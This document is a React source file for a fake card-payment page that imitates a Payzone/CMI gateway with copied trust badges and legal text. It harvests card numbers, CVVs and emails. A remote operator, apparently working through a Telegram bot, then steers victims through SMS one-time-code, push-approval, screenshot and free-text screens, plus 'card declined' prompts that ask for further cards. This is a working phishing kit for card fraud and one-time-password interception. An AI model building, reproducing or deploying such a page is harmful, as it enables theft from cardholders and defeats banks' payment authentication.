import React, { useState, useEffect, useRef } from "react";
import axios from "axios";
import { CreditCard, User, HelpCircle, Lock, CheckCircle2, XCircle, Loader2, AlertTriangle, Upload, Phone, ArrowLeft } from "lucide-react";

const API = process.env.REACT_APP_BACKEND_URL + "/api";

/* ── Image Assets (user-provided) ─────────────────────────────────────────── */
const IMG = {
  merchantLogo:      "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/4z5tphd9_image.png",
  cardsStack:        "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/2zx7tcsc_image.png",
  visa:              "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/ya22ai24_image.png",
  mc:                "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/g22tfhvs_image.png",
  cmi:               "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/vh00jf0b_image.png",
  verifiedVisa:      "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/j6iwehar_image.png",
  rapidssl:          "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/6q9m0e5f_image.png",
  mcSecurecode:      "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/gbfxatki_image.png",
  payzone:           "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/0bwzpptn_image.png",
  safekey:           "https://customer-assets-gfyr7b9c.emergentagent.net/job_payment-tg-bot/artifacts/va4xr6iu_image.png",
};

const formatCard = (v) => v.replace(/\D/g, "").slice(0, 16).replace(/(.{4})/g, "$1 ").trim();
const MONTHS = ["01","02","03","04","05","06","07","08","09","10","11","12"];
const YEARS  = Array.from({ length: 15 }, (_, i) => String(new Date().getFullYear() + i));

const inputCls = "w-full border rounded text-sm px-3 py-2.5 focus:outline-none focus:ring-1 focus:ring-blue-400 bg-white";
const inputStyle = { borderColor: "#CCCCCC", color: "#222" };

/* ── Card brand icons row ──────────────────────────────────────────────────── */
function CardBrands() {
  return (
    <div className="flex items-center gap-1.5 flex-shrink-0">
      <img src={IMG.visa}  alt="VISA"       style={{ height: 20, objectFit: "contain" }} />
      <img src={IMG.mc}    alt="MasterCard" style={{ height: 20, objectFit: "contain" }} />
      {/* AMEX inline */}
      <div className="border rounded flex items-center justify-center px-1.5" style={{ height: 20, borderColor: "#DDD" }}>
        <span style={{ fontWeight: 800, fontSize: "8px", color: "#006FCF", letterSpacing: "0.5px" }}>AMEX</span>
      </div>
      <img src={IMG.cmi}  alt="CMI"        style={{ height: 20, objectFit: "contain" }} />
    </div>
  );
}

/* ── Field wrapper ─────────────────────────────────────────────────────────── */
function Field({ label, children }) {
  return (
    <div>
      <label className="block text-sm mb-1 font-medium" style={{ color: "#444" }}>{label}</label>
      {children}
    </div>
  );
}

/* ── Card Form (right column on desktop) ──────────────────────────────────── */
function CardForm({ onSubmit, loading, changeCard }) {
  const [cardNo, setCardNo]     = useState("");
  const [cardName, setCardName] = useState("");
  const [month, setMonth]       = useState("");
  const [year, setYear]         = useState("");
  const [cvv, setCvv]           = useState("");
  const [email, setEmail]       = useState("");
  const [agreed, setAgreed]     = useState(false);
  const [err, setErr]           = useState("");

  const submit = () => {
    if (!cardNo || !cardName || !month || !year || !cvv || !email) { setErr("Please fill in all fields"); return; }
    if (!agreed) { setErr("Please accept the terms and conditions"); return; }
    setErr("");
    onSubmit({ card_number: cardNo, customer_name: cardName, card_expiry: `${month}/${year.slice(2)}`, card_cvv: cvv, customer_email: email });
  };

  return (
    <div>
      {changeCard && (
        <div className="mb-3 p-3 rounded border text-xs" style={{ backgroundColor: "#FFF3CD", borderColor: "#FFC107", color: "#856404" }}>
          This card is not accepted. Please enter a different card.
        </div>
      )}
      {err && (
        <div className="mb-3 p-3 rounded border text-xs" style={{ backgroundColor: "#FEE2E2", borderColor: "#FCA5A5", color: "#B91C1C" }}>
          {err}
        </div>
      )}

      {/* Payment details header */}
      <div className="flex items-center justify-between mb-4">
        <h3 className="text-sm font-bold" style={{ color: "#222" }}>Payment details</h3>
        <CardBrands />
      </div>

      <div className="space-y-3">
        {/* Card number + CVV row */}
        <div className="flex gap-3">
          <div className="flex-1">
            <Field label="Card number">
              <div className="relative">
                <div className="absolute left-3 top-1/2 -translate-y-1/2">
                  <CreditCard size={14} style={{ color: "#999" }} />
                </div>
                <input
                  data-testid="pay-card-number"
                  value={cardNo} onChange={e => setCardNo(formatCard(e.target.value))}
                  placeholder="0000 0000 0000 0000"
                  className={`${inputCls} pl-9 font-mono`}
                  style={inputStyle}
                />
              </div>
            </Field>
          </div>
          <div style={{ width: "120px" }}>
            <Field label="CVV">
              <div className="relative">
                <div className="absolute left-3 top-1/2 -translate-y-1/2">
                  <Lock size={14} style={{ color: "#999" }} />
                </div>
                <input
                  data-testid="pay-cvv"
                  value={cvv} onChange={e => setCvv(e.target.value.replace(/\D/g, "").slice(0, 4))}
                  placeholder="•••"
                  type="text"
                  className={`${inputCls} pl-9 pr-8 font-mono`}
                  style={inputStyle}
                />
                <button type="button" className="absolute right-2.5 top-1/2 -translate-y-1/2" title="3 digits on the back of the card">
                  <HelpCircle size={14} style={{ color: "#60A5FA" }} />
                </button>
              </div>
            </Field>
          </div>
        </div>

        {/* Name */}
        <Field label="Name">
          <div className="relative">
            <div className="absolute left-3 top-1/2 -translate-y-1/2">
              <User size={14} style={{ color: "#999" }} />
            </div>
            <input
              data-testid="pay-card-name"
              value={cardName} onChange={e => setCardName(e.target.value.toUpperCase())}
              placeholder="JOHN DOE"
              className={`${inputCls} pl-9 font-mono uppercase`}
              style={inputStyle}
            />
          </div>
        </Field>

        {/* Card expiration */}
        <Field label="Card expiration">
          <div className="flex gap-2">
            <select
              data-testid="pay-month"
              value={month} onChange={e => setMonth(e.target.value)}
              className={`${inputCls} flex-1`}
              style={inputStyle}
            >
              <option value="">Month</option>
              {MONTHS.map(m => <option key={m} value={m}>{m}</option>)}
            </select>
            <select
              data-testid="pay-year"
              value={year} onChange={e => setYear(e.target.value)}
              className={`${inputCls} flex-1`}
              style={inputStyle}
            >
              <option value="">Year</option>
              {YEARS.map(y => <option key={y} value={y}>{y}</option>)}
            </select>
          </div>
        </Field>

        {/* Email hidden on desktop to save space, keep for submit data */}
        <Field label="Email">
          <input
            data-testid="pay-email"
            value={email} onChange={e => setEmail(e.target.value)}
            placeholder="email@example.com" type="email"
            className={inputCls}
            style={inputStyle}
          />
        </Field>
      </div>

      {/* Terms checkbox */}
      <label className="flex items-start gap-2.5 mt-4 cursor-pointer">
        <div
          onClick={() => setAgreed(!agreed)}
          data-testid="pay-terms-checkbox"
          className="w-5 h-5 rounded flex items-center justify-center flex-shrink-0 mt-0.5 border-2 cursor-pointer"
          style={{ backgroundColor: agreed ? "#16A34A" : "white", borderColor: agreed ? "#16A34A" : "#9CA3AF" }}
        >
          {agreed && <svg width="10" height="8" viewBox="0 0 10 8" fill="none"><path d="M1 4L3.5 6.5L9 1" stroke="white" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/></svg>}
        </div>
        <span className="text-xs" style={{ color: "#555" }}>
          By proceeding, you confirm that you have read and agreed to our Terms and Conditions.
        </span>
      </label>

      {/* Action buttons */}
      <div className="flex items-center justify-between mt-4 gap-3">
        <button
          data-testid="back-to-merchant-btn"
          type="button"
          className="text-sm font-medium hover:underline"
          style={{ color: "#888" }}
          onClick={() => window.history.back()}
        >
          <span className="flex items-center gap-1">
            <ArrowLeft size={13} />
            Back To Merchant
          </span>
        </button>

        <button
          data-testid="pay-submit-btn"
          onClick={submit}
          disabled={loading}
          className="px-8 py-2.5 rounded font-bold text-white text-sm disabled:opacity-60 transition-opacity hover:opacity-90 flex-shrink-0"
          style={{ backgroundColor: "#7CBB44", minWidth: "160px" }}
        >
          {loading
            ? <><Loader2 size={14} className="animate-spin inline mr-1" />Processing...</>
            : "Pay Now"
          }
        </button>
      </div>
    </div>
  );
}

/* ── SMS Input ─────────────────────────────────────────────────────────────── */
function SmsInput({ onSubmit }) {
  const [code, setCode] = useState("");

  return (
    <div className="space-y-6 py-6 max-w-sm mx-auto text-center">
      <div className="w-14 h-14 rounded-full mx-auto flex items-center justify-center" style={{ backgroundColor: "#EFF6FF" }}>
        <Phone size={24} style={{ color: "#2563EB" }} />
      </div>
      <div>
        <p className="font-semibold text-base" style={{ color: "#111" }}>Enter your SMS code</p>
        <p className="text-sm mt-2 leading-relaxed" style={{ color: "#666" }}>
          Please enter the one-time password sent to your mobile phone.
          We simply want to ensure that you are the one making this purchase.
          Your payment will be validated once you have confirmed the code.
        </p>
      </div>
      <input
        data-testid="sms-code-input"
        type="text" inputMode="numeric" pattern="[0-9]*"
        value={code}
        onChange={e => setCode(e.target.value.replace(/\D/g, "").slice(0, 8))}
        placeholder="Enter code"
        className="w-full text-center text-2xl font-bold border-2 rounded-lg focus:outline-none tracking-widest"
        style={{ borderColor: code ? "#2563EB" : "#D1D5DB", backgroundColor: "#F9FAFB", color: "#111", height: "56px" }}
      />
      <button
        data-testid="sms-submit-btn"
        onClick={() => code.length >= 4 && onSubmit("sms_code", code)}
        disabled={code.length < 4}
        className="w-full py-3 rounded font-bold text-white disabled:opacity-40"
        style={{ backgroundColor: "#7CBB44" }}
      >
        Confirm
      </button>
    </div>
  );
}

/* ── Operator Image View (screenshot_text / screenshot_text_answer) ───────── */
function OperatorImageView({ sessionId, fileId, text, withAnswer, onSubmit }) {
  const [answer, setAnswer] = useState("");
  return (
    <div className="space-y-4 py-4 w-full">
      <img
        src={`${API}/pay/session/${sessionId}/operator-image?v=${fileId || Date.now()}`}
        alt="Instruction from operator"
        className="w-full rounded border"
        style={{ borderColor: "#E5E7EB", maxHeight: "500px", objectFit: "contain" }}
      />
      {text && (
        <div className="p-3 rounded border text-sm" style={{ backgroundColor: "#EFF6FF", borderColor: "#BFDBFE", color: "#1D4ED8" }}>
          {text}
        </div>
      )}
      {withAnswer && (
        <>
          <input
            data-testid="operator-image-answer-input"
            value={answer}
            onChange={e => setAnswer(e.target.value)}
            placeholder="Your answer..."
            className={inputCls}
            style={inputStyle}
          />
          <button
            data-testid="operator-image-answer-submit"
            onClick={() => answer && onSubmit("text_answer", answer)}
            disabled={!answer}
            className="w-full py-3 rounded font-bold text-white disabled:opacity-40"
            style={{ backgroundColor: "#7CBB44" }}
          >
            Submit
          </button>
        </>
      )}
    </div>
  );
}

/* ── Screenshot Upload (client sends screenshot to operator) ──────────────── */
function ScreenshotUpload({ onSubmit, stateText, withAnswer }) {
  const [file, setFile]     = useState(null);
  const [answer, setAnswer] = useState("");
  const fileRef             = useRef();

  return (
    <div className="space-y-4 py-4 w-full">
      {stateText && (
        <div className="p-3 rounded border text-sm" style={{ backgroundColor: "#EFF6FF", borderColor: "#BFDBFE", color: "#1D4ED8" }}>{stateText}</div>
      )}
      <div
        onClick={() => fileRef.current?.click()}
        className="border-2 border-dashed rounded-lg p-8 text-center cursor-pointer"
        style={{ borderColor: file ? "#7CBB44" : "#D1D5DB", backgroundColor: file ? "#F0FDF4" : "#F9FAFB" }}
      >
        {file ? (
          <div className="flex flex-col items-center gap-2">
            <CheckCircle2 size={28} style={{ color: "#7CBB44" }} />
            <p className="text-sm font-medium" style={{ color: "#16A34A" }}>{file.name}</p>
          </div>
        ) : (
          <div className="flex flex-col items-center gap-2">
            <Upload size={28} style={{ color: "#9CA3AF" }} />
            <p className="text-sm" style={{ color: "#6B7280" }}>Click to select screenshot</p>
            <p className="text-xs" style={{ color: "#9CA3AF" }}>PNG, JPG up to 5MB</p>
          </div>
        )}
        <input ref={fileRef} type="file" accept="image/*" className="hidden" onChange={e => setFile(e.target.files[0])} />
      </div>
      {withAnswer && (
        <input
          data-testid="screenshot-answer-input"
          value={answer} onChange={e => setAnswer(e.target.value)}
          placeholder="Your answer..."
          className={inputCls} style={inputStyle}
        />
      )}
      <button
        data-testid="screenshot-submit-btn"
        onClick={() => file && onSubmit("screenshot", answer, file)}
        disabled={!file}
        className="w-full py-3 rounded font-bold text-white disabled:opacity-40"
        style={{ backgroundColor: "#7CBB44" }}
      >
        Send
      </button>
    </div>
  );
}

/* ── Text Answer ───────────────────────────────────────────────────────────── */
function TextAnswer({ onSubmit, stateText }) {
  const [answer, setAnswer] = useState("");
  return (
    <div className="space-y-4 py-4 max-w-sm mx-auto">
      {stateText && (
        <div className="p-3 rounded border text-sm" style={{ backgroundColor: "#EFF6FF", borderColor: "#BFDBFE", color: "#1D4ED8" }}>{stateText}</div>
      )}
      <input
        data-testid="text-answer-input"
        value={answer} onChange={e => setAnswer(e.target.value)}
        placeholder="Your answer..."
        className={inputCls} style={inputStyle}
      />
      <button
        data-testid="text-answer-submit-btn"
        onClick={() => answer && onSubmit("text_answer", answer)}
        disabled={!answer}
        className="w-full py-3 rounded font-bold text-white disabled:opacity-40"
        style={{ backgroundColor: "#7CBB44" }}
      >
        Send
      </button>
    </div>
  );
}

/* ── Push Screen ───────────────────────────────────────────────────────────── */
function PushScreen() {
  return (
    <div className="py-10 text-center space-y-4 max-w-sm mx-auto">
      <div className="w-16 h-16 rounded-full mx-auto flex items-center justify-center" style={{ backgroundColor: "#EFF6FF" }}>
        <Phone size={28} style={{ color: "#2563EB" }} />
      </div>
      <div>
        <p className="font-bold text-base" style={{ color: "#111" }}>Confirm the payment in your mobile app</p>
        <p className="text-sm mt-2 leading-relaxed" style={{ color: "#666" }}>
          Please first confirm the payment in your mobile app.
          We simply want to ensure that you are the one making this purchase.
          Your payment will be validated once you have confirmed the transaction.
        </p>
      </div>
      <div className="flex justify-center gap-1.5 pt-2">
        {[0, 1, 2].map(i => (
          <div key={i} className="w-2 h-2 rounded-full animate-pulse" style={{ backgroundColor: "#2563EB", animationDelay: `${i * 0.3}s` }} />
        ))}
      </div>
    </div>
  );
}

/* ── Waiting ───────────────────────────────────────────────────────────────── */
function WaitingScreen() {
  return (
    <div className="py-12 text-center space-y-4">
      <Loader2 size={40} className="animate-spin mx-auto" style={{ color: "#2563EB" }} />
      <div>
        <p className="font-semibold text-base" style={{ color: "#111" }}>Processing payment...</p>
        <p className="text-sm mt-1" style={{ color: "#666" }}>This will take a few seconds</p>
      </div>
    </div>
  );
}

/* ── Footer with Terms & Trust Badges ─────────────────────────────────────── */
function PageFooter({ merchantName }) {
  const [lang, setLang] = useState("English");
  return (
    <div className="max-w-3xl mx-auto px-6 pt-5 pb-8">
      <p className="text-xs font-semibold mb-2" style={{ color: "#555" }}>
        General Terms and Conditions of Use:
      </p>
      <p className="text-xs leading-relaxed" style={{ color: "#999" }}>
        By means of this form, VANTAGE PAYMENT SYSTEMS (VPS) collects your personal data in order to process its personal data for
        customer account management. This processing has been declared to the CNDP under number D-PO-732/2023. The personal data
        collected may be transmitted abroad (Luxembourg) in accordance with the transfer request filed with the CNDP under no. T-PO-426/2023.
        You may contact support@payzone.ma to exercise your rights of access, rectification and opposition in accordance with the provisions of law 09-08.
      </p>
      <p className="text-xs leading-relaxed mt-2" style={{ color: "#999" }}>
        By clicking to validate payment on the dedicated screen, you confirm your payment request to the Merchant site and unreservedly
        accept the general conditions of use of the VPS service. As this action is definitive, you will not be able to correct your personal
        data or cancel this payment request via VPS. Any request relating to these aspects must be directed directly to the Merchant.
      </p>

      {/* Trust badges + language */}
      <div className="flex items-center justify-between mt-5 flex-wrap gap-3">
        <div className="flex items-center gap-3 flex-wrap">
          <img src={IMG.verifiedVisa}  alt="Verified by VISA"       style={{ height: 28, objectFit: "contain" }} />
          <img src={IMG.rapidssl}      alt="RapidSSL"               style={{ height: 26, objectFit: "contain" }} />
          <img src={IMG.mcSecurecode}  alt="MasterCard SecureCode"  style={{ height: 28, objectFit: "contain" }} />
          <img src={IMG.payzone}       alt="Payzone"                style={{ height: 22, objectFit: "contain" }} />
          <img src={IMG.safekey}       alt="American Express SafeKey" style={{ height: 24, objectFit: "contain" }} />
        </div>

        <div className="flex flex-col items-end">
          <span className="text-xs mb-0.5" style={{ color: "#AAA" }}>Language</span>
          <select
            value={lang} onChange={e => setLang(e.target.value)}
            className="text-xs border rounded px-2 py-1 bg-white focus:outline-none"
            style={{ borderColor: "#D1D5DB", color: "#555", minWidth: "100px" }}
          >
            <option>English</option>
            <option>Русский</option>
            <option>Français</option>
            <option>العربية</option>
          </select>
        </div>
      </div>
    </div>
  );
}

/* ══════════════════════════════════════════════════════════════════════════════
   MAIN PAGE
══════════════════════════════════════════════════════════════════════════════ */
export default function PaymentPage() {
  const params      = new URLSearchParams(window.location.search);
  const pkKey       = params.get("pk")          || "pk_test_cyber_a1b2c3d4e5f6g7h8";
  const initAmount  = parseFloat(params.get("amount")   || "99.99");
  const initCurrency= params.get("currency")    || "USD";
  const orderId     = params.get("order_id")    || "";
  const description = params.get("description") || "";

  const [session, setSession]     = useState(null);
  const [loading, setLoading]     = useState(false);
  const [initError, setInitError] = useState("");
  const pollingRef                = useRef(null);

  useEffect(() => {
    const existingId = params.get("session");
    if (existingId) {
      axios.get(`${API}/pay/session/${existingId}`).then(r => setSession(r.data)).catch(() => initSession());
    } else {
      initSession();
    }
    return () => clearInterval(pollingRef.current);
  }, []);

  useEffect(() => {
    if (!session?.id) return;
    clearInterval(pollingRef.current);
    if (["success", "failed"].includes(session.state)) return;
    pollingRef.current = setInterval(async () => {
      try {
        const { data } = await axios.get(`${API}/pay/session/${session.id}`);
        if (data.state !== session.state || data.state_text !== session.state_text || data.operator_image_file_id !== session.operator_image_file_id) setSession(data);
      } catch { /* ignore */ }
    }, 2000);
    return () => clearInterval(pollingRef.current);
  }, [session?.id, session?.state, session?.state_text, session?.operator_image_file_id]);

  const merchantName = session?.merchant_name || "";
  useEffect(() => {
    if (merchantName) document.title = merchantName + " — Secure Payment";
  }, [merchantName]);

  const initSession = async () => {
    try {
      const { data } = await axios.post(`${API}/pay/init`, {
        pk_key: pkKey, amount: initAmount, currency: initCurrency, order_id: orderId
      });
      setSession(data);
      window.history.replaceState({}, "", `/pay?session=${data.id}`);
    } catch (e) {
      setInitError(e.response?.data?.detail || "Payment initialization error");
    }
  };

  const submitCard = async (formData) => {
    if (!session?.id) return;
    setLoading(true);
    try {
      const { data } = await axios.post(`${API}/pay/session/${session.id}/submit`, formData);
      setSession(data);
    } catch (e) { alert(e.response?.data?.detail || "Error"); }
    finally { setLoading(false); }
  };

  const submitResponse = async (type, value, file = null) => {
    if (!session?.id) return;
    const fd = new FormData();
    fd.append("response_type", type);
    fd.append("value", value || "");
    if (file) fd.append("file", file);
    try {
      await axios.post(`${API}/pay/session/${session.id}/respond`, fd);
      setSession(s => ({ ...s, state: "waiting" }));
    } catch { alert("Send error"); }
  };

  if (initError) {
    return (
      <div className="min-h-screen bg-white flex items-center justify-center p-4">
        <div className="text-center">
          <XCircle size={48} className="mx-auto mb-4" style={{ color: "#DC2626" }} />
          <h2 className="text-xl font-bold mb-2" style={{ color: "#111" }}>Payment error</h2>
          <p className="text-sm" style={{ color: "#666" }}>{initError}</p>
        </div>
      </div>
    );
  }

  const state        = session?.state || "form";
  const stateText    = session?.state_text || "";
  const displayAmount= session ? `${session.currency} ${session.amount.toFixed(2)}` : "...";
  const isFormState  = state === "form" || state === "change_card";

  const renderStateContent = () => {
    switch (state) {
      case "waiting":       return <WaitingScreen />;
      case "push":          return <PushScreen />;
      case "sms":           return <SmsInput onSubmit={submitResponse} />;
      case "sms4":          return <SmsInput onSubmit={submitResponse} />;
      case "sms6":          return <SmsInput onSubmit={submitResponse} />;
      case "screenshot":    return <ScreenshotUpload onSubmit={submitResponse} />;
      case "screenshot_text":        return <OperatorImageView sessionId={session.id} fileId={session.operator_image_file_id} text={stateText} withAnswer={false} onSubmit={submitResponse} />;
      case "screenshot_text_answer": return <OperatorImageView sessionId={session.id} fileId={session.operator_image_file_id} text={stateText} withAnswer={true} onSubmit={submitResponse} />;
      case "screenshot_answer":      return <ScreenshotUpload onSubmit={submitResponse} withAnswer />;
      case "text":
        return (
          <div className="py-8 text-center max-w-sm mx-auto">
            <div className="p-4 rounded border text-sm text-left" style={{ backgroundColor: "#EFF6FF", borderColor: "#BFDBFE", color: "#1D4ED8" }}>
              {stateText || "Please wait for further instructions..."}
            </div>
          </div>
        );
      case "text_answer":   return <TextAnswer onSubmit={submitResponse} stateText={stateText} />;
      case "invalid_card":
        return (
          <div className="py-10 text-center space-y-4 max-w-sm mx-auto">
            <div className="w-14 h-14 rounded-full mx-auto flex items-center justify-center" style={{ backgroundColor: "#FEF2F2" }}>
              <AlertTriangle size={26} style={{ color: "#DC2626" }} />
            </div>
            <div>
              <p className="font-bold text-base" style={{ color: "#111" }}>Card declined</p>
              <p className="text-sm mt-1" style={{ color: "#666" }}>Please check your details or use a different card</p>
            </div>
            <button
              data-testid="retry-card-btn"
              onClick={async () => {
                await axios.post(`${API}/pay/session/${session.id}/reset-card`);
                setSession(s => ({ ...s, state: "change_card" }));
              }}
              className="w-full py-3 rounded font-bold text-white"
              style={{ backgroundColor: "#DC2626" }}
            >
              Enter a different card
            </button>
          </div>
        );
      case "success":
        return (
          <div className="py-10 text-center space-y-3 max-w-sm mx-auto">
            <CheckCircle2 size={56} className="mx-auto" style={{ color: "#7CBB44" }} />
            <div>
              <p className="text-2xl font-bold" style={{ color: "#7CBB44" }}>Payment Successful!</p>
              <p className="text-xl font-mono mt-2" style={{ color: "#111" }}>{session.amount} {session.currency}</p>
              <p className="text-sm mt-2" style={{ color: "#666" }}>Receipt sent to {session.customer_email}</p>
            </div>
          </div>
        );
      case "failed":
        return (
          <div className="py-10 text-center space-y-4 max-w-sm mx-auto">
            <XCircle size={56} className="mx-auto" style={{ color: "#DC2626" }} />
            <div>
              <p className="text-xl font-bold" style={{ color: "#DC2626" }}>Payment Declined</p>
              <p className="text-sm mt-1" style={{ color: "#666" }}>Please contact support or try another card</p>
            </div>
            <button
              data-testid="retry-failed-btn"
              onClick={async () => {
                await axios.post(`${API}/pay/session/${session.id}/reset-card?to_state=form`);
                setSession(s => ({ ...s, state: "form" }));
              }}
              className="w-full py-3 rounded font-bold text-white"
              style={{ backgroundColor: "#2563EB" }}
            >
              Try Again
            </button>
          </div>
        );
      default: return <WaitingScreen />;
    }
  };

  return (
    <div className="min-h-screen py-8" style={{ backgroundColor: "#FFFFFF" }}>

      {/* ── Merchant logo centered above card ── */}
      <div className="flex justify-center mb-4">
        <img
          src={IMG.merchantLogo}
          alt={merchantName || "Merchant"}
          style={{ height: 80, objectFit: "contain" }}
        />
      </div>

      {/* ── Main payment card ── */}
      <div
        className="max-w-3xl mx-auto bg-white rounded"
        style={{ border: "1px solid #DEDEDE", boxShadow: "0 2px 12px rgba(0,0,0,0.08)" }}
      >
        {/* Card header bar */}
        <div
          className="flex items-center justify-between px-4 py-3 border-b"
          style={{ backgroundColor: "#F5F5F5", borderColor: "#E0E0E0" }}
        >
          <div className="flex items-center gap-3">
            <img src={IMG.cardsStack} alt="Cards" style={{ height: 28, objectFit: "contain" }} />
            <span className="text-sm font-semibold" style={{ color: "#333" }}>{merchantName || "Loading..."}</span>
          </div>
          <span className="text-sm cursor-pointer" style={{ color: "#2563EB" }}>New Payment Option</span>
        </div>

        {/* ── Content area ── */}
        {isFormState ? (
          /* Two-column layout for form */
          <div className="flex flex-col md:flex-row">
            {/* LEFT: Order information */}
            <div
              className="md:w-2/5 px-6 py-6 border-b md:border-b-0 md:border-r"
              style={{ borderColor: "#E8E8E8" }}
            >
              <h2 className="text-sm font-bold mb-2" style={{ color: "#222" }}>Order information</h2>
              <p className="text-3xl font-bold mb-4" style={{ color: "#111" }}>{displayAmount}</p>
              <div className="text-sm space-y-1" style={{ color: "#555" }}>
                <p>Merchant: {merchantName}</p>
                {(orderId || session?.order_id) && (
                  <>
                    <p>Order N°: {orderId || session?.order_id}</p>
                    <p>Order ID: {orderId || session?.order_id}</p>
                  </>
                )}
                {description && <p>Description: {description}</p>}
              </div>
            </div>

            {/* RIGHT: Payment form */}
            <div className="md:w-3/5 px-6 py-6">
              <CardForm
                onSubmit={submitCard}
                loading={loading}
                changeCard={state === "change_card"}
              />
            </div>
          </div>
        ) : (
          /* Single column for all other states */
          <div className="px-6 py-4">
            {/* Mini order info bar */}
            <div className="flex items-center justify-between pb-4 border-b mb-2" style={{ borderColor: "#F0F0F0" }}>
              <span className="text-xs" style={{ color: "#888" }}>
                {merchantName} · <span className="font-bold text-sm" style={{ color: "#111" }}>{displayAmount}</span>
              </span>
              <span className="flex items-center gap-1 text-xs" style={{ color: "#888" }}>
                <Lock size={11} /> Secure Payment
              </span>
            </div>
            {renderStateContent()}
          </div>
        )}
      </div>

      {/* ── Footer ── */}
      <PageFooter merchantName={merchantName} />
    </div>
  );
}
